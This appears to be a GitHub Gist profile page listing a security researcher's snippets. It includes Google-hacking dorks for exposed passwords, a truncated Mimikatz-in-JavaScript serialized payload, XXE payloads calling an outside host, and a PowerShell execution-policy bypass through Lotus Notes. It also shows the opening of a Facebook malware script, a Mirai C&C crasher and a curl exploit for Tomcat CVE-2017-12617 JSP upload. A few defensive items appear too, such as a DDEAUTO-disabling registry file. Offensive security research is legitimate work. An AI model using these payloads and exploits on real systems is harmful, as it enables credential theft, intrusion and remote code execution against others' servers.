Skip to content

Instantly share code, notes, and snippets.

View P3t3rp4rk3r's full-sized avatar
🏠
Working from home

Santhosh Baswa P3t3rp4rk3r

🏠
Working from home
189 followers · 236 following
View GitHub Profile
@P3t3rp4rk3r
P3t3rp4rk3r / GoogleHackMasterList.txt
Created April 23, 2017 06:11 — forked from cmartinbaughman/GoogleHackMasterList.txt
The definitive super list for "Google Hacking".
admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www” domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com
@P3t3rp4rk3r
P3t3rp4rk3r / katz.js
Created April 29, 2017 17:56
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
@P3t3rp4rk3r
P3t3rp4rk3r / github_bugbountyhunting.md
Created August 9, 2017 04:52 — forked from EdOverflow/github_bugbountyhunting.md
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@P3t3rp4rk3r
P3t3rp4rk3r / XXE_payloads
Created August 11, 2017 06:40 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@P3t3rp4rk3r
P3t3rp4rk3r / IBM_LotusNotes_Powershell_Execution_Bypass
Created August 24, 2017 10:07
"C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Hashes of each binary (prepare for onslaught of md5 naysayers):
Notes.exe — 8f633ef1e1147637c25dd917909cd361
NLNOTES.EXE — 3586b9069a1d4e1c63d9c9cf95cf4126
@P3t3rp4rk3r
P3t3rp4rk3r / Facebook_Malware_Script.js
Created August 24, 2017 19:26
var cnsl = true;
var win = this;
var ajax = win["XMLHttpRequest"];
function start() {
var cookie_name = "app_" + profile_id;
var cookie_time = 40;
if (!getCookie(cookie_name) || parseInt(getCookie(cookie_name)) < Date.now() - 60 * 1000 * cookie_time) {
createCookie(cookie_name, Date.now(), 1);
config = {};
@P3t3rp4rk3r
P3t3rp4rk3r / CIA_Angelfire_Checker.ps1
Created September 1, 2017 05:26
if ((Get-Item -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Windows').GetValue('SystemLookup')) {Write-Host "Angelfire found!"} else {Write-Host "Nothing"}
@P3t3rp4rk3r
P3t3rp4rk3r / Mirai_C&C_Crash.py
Created September 12, 2017 20:21
# Mirai CNC Crasher
# just put all the mirai cnc ips/domains in a file that u want to crash
import sys, telnetlib, time
from threading import Thread
filename = sys.argv[0]
if len(sys.argv) < 2:
@P3t3rp4rk3r
P3t3rp4rk3r / CVE-2017-12617.md
Created October 10, 2017 15:07

Exploit using 'curl':

Create a .jsp file (e.g. test.jsp):

<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>

Perform the curl command on target server:

curl -X PUT http://target:port/test.jsp/ -d @- < test.jsp

Check if your file is uploaded by browsing to the target address or:

@P3t3rp4rk3r
P3t3rp4rk3r / disable_ddeauto.reg
Created October 23, 2017 08:54 — forked from wdormann/disable_ddeauto.reg
Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
"DontUpdateLinks"=dword:00000001